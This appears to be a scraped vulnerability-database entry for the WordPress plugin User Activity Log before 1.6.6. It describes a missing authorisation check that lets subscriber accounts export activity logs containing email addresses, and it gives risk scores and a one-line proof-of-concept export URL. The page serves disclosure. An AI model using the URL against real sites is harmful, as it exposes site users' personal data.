Lucene search

K
wpexploitDaniel RufWPEX-ID:DB3E4336-117C-47F2-9B43-2CA115525297
HistoryAug 09, 2023 - 12:00 a.m.

User Activity Log < 1.6.6 - Subscriber+ Log Export

2023-08-0900:00:00
Daniel Ruf
26
subscriber
url
export
log
security exploit

4.7 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

14.0%

Description The plugin lacks proper authorisation when exporting its activity logs, allowing any authenticated users, such as subscriber to perform such action and retrieve PII such as email addresses.

As a subscriber, open the following URL

https://example.com/wp-admin/admin-post.php?page=user_action_log&export=user_logs&logformat=csv&userrole&dateshow&username&type&showip&txtsearch&export-nonce=aaa

4.7 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

14.0%

Related for WPEX-ID:DB3E4336-117C-47F2-9B43-2CA115525297